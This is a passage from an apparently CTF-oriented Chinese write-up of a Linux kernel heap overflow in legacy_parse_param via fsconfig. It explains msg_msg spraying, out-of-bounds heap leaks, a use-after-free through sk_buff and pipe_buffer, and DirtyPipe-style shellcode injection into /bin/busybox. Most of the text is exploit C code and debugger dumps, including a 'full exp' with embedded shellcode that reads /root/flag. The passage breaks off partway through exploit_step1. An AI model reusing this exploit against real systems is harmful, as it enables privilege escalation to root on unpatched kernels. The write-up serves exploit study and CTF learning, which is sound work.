|0x1000------|0x1000---|0x400-------|0x400------|-- ... --|
  • 伙伴系统分配的伙伴页物理地址连续,但不能确定 msg_msgsegB 一定是 msg_msgseg 结构体

然后使用堆溢出来修改 msg_msg.m_ts,读取后续的 msg_msgsegB 并确定该区域为 msg_msgseg 结构体(否则就重新堆喷):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
char buff[0x1000];
logd("[*] prepare fsconfig heap overflow\n"); /* 准备堆溢出(使后续调用的fsconfig触发堆溢出) */
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.m_ts (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.m_ts\n");
memset(buff, 0, sizeof(buff));
strcat(buff, "0000000"); // m_list.next
strcat(buff, "11111111"); // m_list.prev
strcat(buff, "22222222"); // m_type
uint64_t target_size = sizeof(msg_a_oob.mtext);
memcpy(buff + strlen(buff), &target_size, 2);

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", buff, 0); /* 触发堆溢出 */

// recv from buffer to see if leak success
logd("[*] search corrupted msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
ssize_t copy_size = msgrcv(msqid_1[i], &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);

if (copy_size < 0) {
continue;
}
if (copy_size == sizeof(msg_a_oob.mtext)) {
logd("[+] corrupted msg_msg found, id: %d\n", msqid_1[i]);
list1_corrupted_msqid = msqid_1[i];
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
logd("[!] but the next object is not allocated by msg_msgseg\n");
}
break;
}
}

在触发堆溢出的地方断点,打印数据如下:

1
2
3
4
0xffffffff8121f18f <legacy_parse_param+527>    call   memcpy            <memcpy>
dest: 0xffff888004a0b001 ◂— 0xc0ffff888004978e
src: 0xffff888003707780 ◂— 0x3130303030303030 ('00000001')
n: 0x19
1
2
3
4
5
6
7
8
20:0100│ rdi-1 0xffff888004a0b000 —▸ 0xffff888004978e3d ◂— 0x0
21:0108│       0xffff888004a0b008 —▸ 0xffff888004978ec0 —▸ 0xffff888004a0b000 —▸ 0xffff888004978e3d ◂— 0
22:0110│       0xffff888004a0b010 ◂— 0x41 /* 'A' */
23:0118│       0xffff888004a0b018 ◂— 0x13c8
24:0120│       0xffff888004a0b020 —▸ 0xffff8880049e7000 ◂— 0x0
25:0128│       0xffff888004a0b028 —▸ 0xffff888004b619d8 ◂— 0x1
26:0130│       0xffff888004a0b030 ◂— 0x13371337
27:0138│       0xffff888004a0b038 ◂— 0x5151515151515151 ('QQQQQQQQ')
1
2
3
4
5
6
20:0100│ rax-1 rdi-1 0xffff888004a0b000 ◂— 0x303030303030303d ('=0000000')
21:0108│             0xffff888004a0b008 ◂— 0x3131313131313131 ('11111111')
22:0110│             0xffff888004a0b010 ◂— 0x3232323232323232 ('22222222')
23:0118│             0xffff888004a0b018 ◂— 0x17c8
24:0120│             0xffff888004a0b020 —▸ 0xffff8880049e7000 ◂— 0x0
25:0128│             0xffff888004a0b028 —▸ 0xffff888004b619d8 ◂— 0x1
  • 可以发现 msg_msg.m_ts 被扩大,使其可以向后溢出泄露地址

当我们确定 msg_msgsegB 为一个 msg_msgseg 结构体后,就可以将除了 msg_msgsegA 的所有 msg_msgseg 都释放掉,然后用 0x400 的 msg_msg 进行堆喷占位:

1
2
3
|page1-------|page2----|page3---------------------------|
[legacy_data][msg_msgA][msg_msgsegA][free slob][...][...]
|0x1000------|0x1000---|0x400-------|0x400----|-- ... --|
1
2
3
|page1-------|page2----|page3--------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgB][...][...]
|0x1000------|0x1000---|0x400-------|0x400---|-- ... --|
  • 这里假设命中 free slob 的 msg_msg 结构体为 msg_msgB

接着就可以泄露 msg_msgB 各个条目的信息了,部分脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_1(); /* msg_msgA的m_type已经被修改,因此不会释放msg_msgA和msg_msgsegA */

// realloc 0x400 slab with msg_msg
logd("[*] alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...\n");
for (int i = 0; i < NUM_MSQIDS_2; i++) {
memset(&msg_b, 0, sizeof(msg_b));
memset(msg_b.mtext, 'W', sizeof(msg_b.mtext));
((int *)&msg_b.mtext)[0] = MSG_SIG;
((int *)&msg_b.mtext)[1] = i;
for (int j = 0; j < 0x10; j++) {
msg_b.mtype = MTYPE_B | (j << 8);
if (msgsnd(msqid_2[i], &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}
}

// hope leak happen
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] bad luck, we don't catch 0x400 msg_msg\n");
clean_msq_2();
return 1;
}
logd("[*] it works :)\n");

list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
list2_leak_mtype = p->m_type;
list2_uaf_msg_addr = p->m_list.prev;
list2_uaf_mtype = p->m_type - 0x0100;
msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
hexdump(msg_a_oob.mtext + sizeof(msg_a.mtext), 0x40);
logd("[+] leak list2_leak_msqid: %d\n", list2_leak_msqid);
logd("[+] leak list2_leak_mtype: 0x%x\n", list2_leak_mtype);
logd("[+] leak list2_uaf_msg_addr: 0x%lx\n", list2_uaf_msg_addr);
logd("[+] leak list2_uaf_mtype: 0x%x\n", list2_uaf_mtype);
}

目前的堆布局如下:

1
2
3
4
5
6
|page1-------|page2----|page3--------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgB][...][...]
|0x1000------|0x1000---|0x400-------|0x400---|-- ... --|
||-(prev)->msg_msgC(地址泄露)
||-(next)->msg_msgD
0x400:msg_msgC->msg_msgB->msg_msgD
  • 通过 msg_msgB 已经泄露了 msg_msgC 的地址,这个 msg 后面会被拿来做 UAF

接下来就可以将 msg_msgD 以及其后的 msg_msg 都释放掉,重新申请一个 msg_msgX,这样X的地址就会写到 msg_msgB 的 next 指针处

  • 受限于场景,需要在 msg_msgX 中部署一个 fake msg_msg,让伪造 msg_msg->next 指向 msg_msgC(后续利用会需要)

接着再次使用 OOB read,就能知道 msg_msgX 的地址,部分脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
logd("[*] alloc msg_msg as heap buffer with known address\n");
{
for (int j = ((list2_leak_mtype + 0x100) >> 8); j < 0x10; j++) {
msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT); /* 释放msg_msgD以及其后的msg_msg */
}
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = list2_uaf_msg_addr; /* 填写msg_msgC(在上一步中泄露) */
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A;

memset(&msg_b, 0, sizeof(msg_b));
memcpy(msg_b.mtext, buff, sizeof(msg_b.mtext));
msg_b.mtype = MTYPE_B;
if (msgsnd(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), 0) < 0) {
/* 申请msg_msgX(msg_msgX的地址将会写在msg_msgB->next处) */
logd("[-] msgsnd() fail\n");
die();
}
}

logd("[*] fetch heap_buffer address by oob read again\n");
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] Recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] I don't think this can happen\n");
die();
}
heap_buffer_addr = p->m_list.next + sizeof(struct msg_msg); /* 泄露msg_msgX的地址,而这里的heap_buffer_addr记录的是fake msg_msg的地址 */
logd("[+] heap_buffer_addr: 0x%lx\n", heap_buffer_addr);
if (strlen((char *)&heap_buffer_addr) < 8) {
logd("[-] pointer can't contain 0x00 bytes\n");
die();
}
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_2();

再次调用 fsopen 准备好堆溢出,这一次修改 m_list.next 使其指向之前部署的 fake msg_msg(而 fake msg_msg->next 则是指向已知地址的 msg_msgC)

接着,将 msg_msgB 从正常的 msg 队列中取出,再堆喷 sk_buff->data 占用 msg_msgB 的空间:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.next (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.next\n");
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr; /* 修改next指针为fake msg_msg */
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A; // with '=' appended
fsconfig(fd, FSCONFIG_SET_STRING, buff, "\x00", 0);

// free uaf msg_msg
logd("[*] free uaf msg_msg from correct msqid\n");
if (msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), list2_uaf_mtype, 0) < 0) {
logd("[-] msgrcv() fail\n");
die();
}

// spary skbuff_data to re-acquire uaf msg_msg and fake the header
logd("[*] spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg\n");
{
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr + 0x80;
p->m_list.prev = heap_buffer_addr + 0x80;
p->m_ts = 0x100;
p->m_type = MTYPE_FAKE;
p->next = 0;
p->security = 0;
spray_skbuff_data(buff, 0x400 - 0x140); /* 利用sk_buff进行占位 */
}

尝试释放 fake msg_msg,就会得到一个 UAF slob:

1
2
3
4
5
6
7
logd("[*] free skbuff_data using fake msqid\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
if (msgrcv(msqid_1[i], &msg_b, sizeof(msg_b.mtext), MTYPE_FAKE, IPC_NOWAIT) > 0) {
logd("[*] freed using msqid %d\n", i);
break;
}
}

最后再往 UAF slob 中堆喷 pipe_buffer,利用 sk_buff 修改 pipe_buffer->flags,之后的步骤就和 DirtyPipe 一样了(往 /bin/busybox 中写入 shellcode)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)
#define NUM_MSQIDS_1 (0x400)
#define NUM_MSQIDS_2 (0x400)
#define MSG_A_RAW_SIZE (0x1400 - 0x8)
#define MSG_A_BUFF_SIZE (MSG_A_RAW_SIZE - sizeof(struct msg_msg))
#define MSG_B_RAW_SIZE (0x400)
#define MSG_B_BUFF_SIZE (MSG_B_RAW_SIZE - sizeof(struct msg_msg))
#define MTYPE_A (0x41)
#define MTYPE_B (0x42)
#define MTYPE_FAKE (0x43)
#define MSG_SIG (0x13371337)
#define NUM_PIPES (0x100)
#define NUM_SOCKETS (4)
#define NUM_SKBUFFS (0x80)

/* Doubly-linked list node whose two links are stored as raw 64-bit values
 * (not C pointers), so they can be filled in or read back as plain integers. */
struct list_head {
uint64_t next; /* link to the following node */
uint64_t prev; /* link to the preceding node */
};

/* Message header layout that this program overlays on raw byte buffers.
 * Six 64-bit fields (0x30 bytes) followed directly by the message text. */
struct msg_msg {
struct list_head m_list; /* queue links (next/prev) */
uint64_t m_type; /* message type */
uint64_t m_ts; /* message text size */
uint64_t next; /* NOTE(review): presumably the link to the first continuation segment - confirm against the kernel definition */
uint64_t security;
char mtext[0]; /* zero-length tail: the text starts right after the header */
};

/* Header of a message continuation segment: a single 64-bit link (8 bytes). */
struct msg_msgseg {
uint64_t next; /* link to the following segment */
};

/* User-space message buffer of type "A" as passed to msgsnd()/msgrcv():
 * a type word followed by MSG_A_BUFF_SIZE bytes of text. */
struct typ_msg_a {
long mtype; /* message type selector */
char mtext[MSG_A_BUFF_SIZE]; /* message text */
};

/* Receive buffer for a type "A" message with 0x400 extra bytes of room
 * after the regular MSG_A_BUFF_SIZE text area. */
struct typ_msg_a_oob {
long mtype; /* message type selector */
char mtext[MSG_A_BUFF_SIZE + 0x400]; /* regular text plus 0x400 trailing bytes */
};

/* User-space message buffer of type "B": a type word followed by
 * MSG_B_BUFF_SIZE bytes of text. */
struct typ_msg_b {
long mtype; /* message type selector */
char mtext[MSG_B_BUFF_SIZE]; /* message text */
};

unsigned char elfcode[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x68, 0x60, 0x66, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01, 0x01, 0x01,
0x48, 0xb8, /* /root */ 0x2f, 0x72, 0x6f, 0x6f, 0x74, /* /flag */ 0x2f, 0x66, 0x6c, 0x50, 0x6a,
0x02, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff,
0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f,
0x99, 0x0f, 0x05, 0xEB
};

int sockfd;
int sock_pairs[NUM_SOCKETS][2];
int msqid_1[NUM_MSQIDS_1];
int msqid_2[NUM_MSQIDS_2];
struct typ_msg_a msg_a = {0};
struct typ_msg_a_oob msg_a_oob = {0};
struct typ_msg_b msg_b = {0};
int list1_corrupted_msqid = -1;
int list2_leak_msqid = -1;
int list2_leak_mtype = 0;
uint64_t list2_uaf_msg_addr = 0;
int list2_uaf_mtype = 0;
uint64_t heap_buffer_addr = 0;
int dummy_pipe[NUM_PIPES][2];

/* Manual pause point: prints "waiting..." and blocks until a character
 * is available on stdin. */
void z() {
logd("waiting...\n");
getchar();
}

/* Terminates the process with exit status 1. */
void die() {
exit(1);
}

/*
 * Dump `size` bytes starting at `data` through logd() as rows of up to
 * 16 hex bytes, each row followed by its printable-ASCII rendering
 * (non-printable bytes are shown as '.').
 */
void hexdump(const void *data, size_t size) {
    const unsigned char *bytes = (const unsigned char *)data;
    char text[17];
    text[16] = '\0';

    for (size_t pos = 0; pos < size; ++pos) {
        const unsigned char b = bytes[pos];
        const size_t filled = (pos + 1) % 16; /* bytes in the current row, 0 == row complete */
        const int is_last = (pos + 1 == size);

        logd("%02X ", b);
        text[pos % 16] = (b >= ' ' && b <= '~') ? (char)b : '.';

        /* Nothing more to emit unless we sit on an 8-byte boundary or the final byte. */
        if ((pos + 1) % 8 != 0 && !is_last) {
            continue;
        }
        logd(" ");

        if (filled == 0) {
            /* Full row: flush the ASCII column. */
            logd("| %s \n", text);
            continue;
        }
        if (!is_last) {
            continue;
        }

        /* Partial final row: terminate the text and pad the hex column. */
        text[filled] = '\0';
        if (filled <= 8) {
            logd(" ");
        }
        for (size_t pad = filled; pad < 16; ++pad) {
            logd(" ");
        }
        logd("| %s \n", text);
    }
}

/* Best-effort write of `text` to `path`: failures are reported via perror()
 * and otherwise ignored, so the caller keeps going. */
static void write_proc_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror(path);
        return;
    }
    if (write(fd, text, strlen(text)) < 0) {
        perror(path);
    }
    close(fd);
}

/*
 * Move the process into new mount and user namespaces and map the caller's
 * original uid/gid to id 0 inside the new user namespace (the equivalent of
 * `unshare -Ur`).
 *
 * The ids are sampled BEFORE unshare(): once the new user namespace exists
 * and no mapping has been written yet, getuid()/getgid() report the overflow
 * id instead of the real one, which would produce a wrong map line.
 */
void init_unshare() {
    char buff[0x100];
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();

    // strace from `unshare -Ur xxx`
    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {
        perror("unshare");
    }

    /* setgroups must be denied before an unprivileged gid_map write is accepted */
    write_proc_file("/proc/self/setgroups", "deny");

    snprintf(buff, sizeof(buff), "0 %d 1", (int)outer_uid);
    write_proc_file("/proc/self/uid_map", buff);

    snprintf(buff, sizeof(buff), "0 %d 1", (int)outer_gid);
    write_proc_file("/proc/self/gid_map", buff);
}

/*
 * Create one private message queue per slot of msqid_1[] and msqid_2[].
 * Any msgget() failure is logged and terminates the process via die().
 */
void init_msq() {
    int slot = 0;

    while (slot < NUM_MSQIDS_1) {
        const int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        msqid_1[slot] = qid;
        if (qid < 0) {
            logd("[-] msgget() fail\n");
            die();
        }
        ++slot;
    }

    slot = 0;
    while (slot < NUM_MSQIDS_2) {
        const int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        msqid_2[slot] = qid;
        if (qid < 0) {
            logd("[-] msgget() fail\n");
            die();
        }
        ++slot;
    }
}

/*
 * Open the global TCP socket `sockfd` and fill sock_pairs[] with
 * NUM_SOCKETS AF_UNIX stream socket pairs. Any failure is logged and
 * terminates the process via die().
 */
void init_sock() {
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        logd("[-] socket() fail\n");
        die();
    }

    int idx = 0;
    while (idx < NUM_SOCKETS) {
        const int rc = socketpair(AF_UNIX, SOCK_STREAM, 0, sock_pairs[idx]);
        if (rc < 0) {
            logd("[-] socketpair() fail\n");
            die();
        }
        idx++;
    }
}

/*
 * Non-blocking receive of one MTYPE_A message from every queue in
 * msqid_1[]; results are ignored, so empty queues are simply skipped.
 */
void clean_msq_1() {
    const int *const end = msqid_1 + NUM_MSQIDS_1;
    for (const int *qid = msqid_1; qid != end; ++qid) {
        msgrcv(*qid, &msg_a, sizeof(msg_a.mtext), MTYPE_A, IPC_NOWAIT);
    }
}

/*
 * For every queue in msqid_2[], issue sixteen non-blocking receives, one
 * per message type `MTYPE_B | (j << 8)` with j = 0..15. Results are ignored.
 */
void clean_msq_2() {
    const int total = NUM_MSQIDS_2 * 0x10;
    for (int n = 0; n < total; n++) {
        const int queue = n >> 4;   /* outer index: which queue */
        const int sub = n & 0xf;    /* inner index: which sub-type */
        msgrcv(msqid_2[queue], &msg_b, sizeof(msg_b.mtext), MTYPE_B | (sub << 8), IPC_NOWAIT);
    }
}

/*
 * For each pipe in dummy_pipe[]: read up to 0x100 bytes from the read end
 * (result ignored), then close both ends.
 */
void clean_pipe() {
    char scratch[0x100];
    for (int idx = 0; idx != NUM_PIPES; ++idx) {
        int *ends = dummy_pipe[idx];
        read(ends[0], scratch, sizeof(scratch));
        close(ends[0]);
        close(ends[1]);
    }
}

/*
 * Restrict the calling thread's CPU affinity to CPU 0. On failure the
 * error is printed with perror() and the process exits via die().
 */
void bind_cpu() {
    cpu_set_t only_cpu0;
    CPU_ZERO(&only_cpu0);
    CPU_SET(0, &only_cpu0);

    const int rc = sched_setaffinity(0, sizeof(cpu_set_t), &only_cpu0);
    if (rc == 0) {
        return;
    }
    perror("sched_setaffinity");
    die();
}

/*
 * Open a filesystem context for "ext4" through the fsopen() wrapper macro.
 * Returns the resulting descriptor; on failure prints the error with
 * perror() and exits via die().
 */
int call_fsopen() {
    const int ctx_fd = fsopen("ext4", 0);
    if (ctx_fd >= 0) {
        return ctx_fd;
    }
    perror("fsopen");
    die();
    return ctx_fd;
}

/*
 * Write the `size` bytes at `ptr` NUM_SKBUFFS times into the first end of
 * each of the NUM_SOCKETS socket pairs (pair by pair). A failed write is
 * logged and terminates the process via die().
 */
void spray_skbuff_data(void *ptr, size_t size) {
    const int total = NUM_SOCKETS * NUM_SKBUFFS;
    for (int n = 0; n < total; n++) {
        const int tx_fd = sock_pairs[n / NUM_SKBUFFS][0];
        if (write(tx_fd, ptr, size) >= 0) {
            continue;
        }
        logd("[-] write to sock pairs failed\n");
        die();
    }
}

/*
 * Read up to `size` bytes into `ptr` NUM_SKBUFFS times from the second end
 * of each of the NUM_SOCKETS socket pairs (pair by pair); each read
 * overwrites the previous contents of `ptr`. A failed read is logged and
 * terminates the process via die().
 */
void free_skbuff_data(void *ptr, size_t size) {
    const int total = NUM_SOCKETS * NUM_SKBUFFS;
    for (int n = 0; n < total; n++) {
        const int rx_fd = sock_pairs[n / NUM_SKBUFFS][1];
        if (read(rx_fd, ptr, size) >= 0) {
            continue;
        }
        logd("[-] read from sock pairs failed\n");
        die();
    }
}

uint64_t exploit_step1(int fd) {
char buff[0x1000];
logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.m_ts (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.m_ts\n");
memset(buff, 0, sizeof(buff));
strcat(buff, "0000000"); // m_list.next
strcat(buff, "11111111"); // m_list.prev
strcat(buff, "22222222"); // m_type
uint64_t target_size = sizeof(msg_a_oob.mtext);
memcpy(buff + strlen(buff), &target_size, 2);

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", buff, 0);

// recv from buffer to see if leak success
logd("[*] search corrupted msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
ssize_t copy_size = msgrcv(msqid_1[i], &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);

if (copy_size < 0) {
continue;
}
if (copy_size == sizeof(msg_a_oob.mtext)) {
logd("[+] corrupted msg_msg found, id: %d\n", msqid_1[i]);
list1_corrupted_msqid = msqid_1[i];
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
logd("[!] but the next object is not allocated by msg_msgseg\n");
}
break;
}
}
if (list1_corrupted_msqid < 0) {
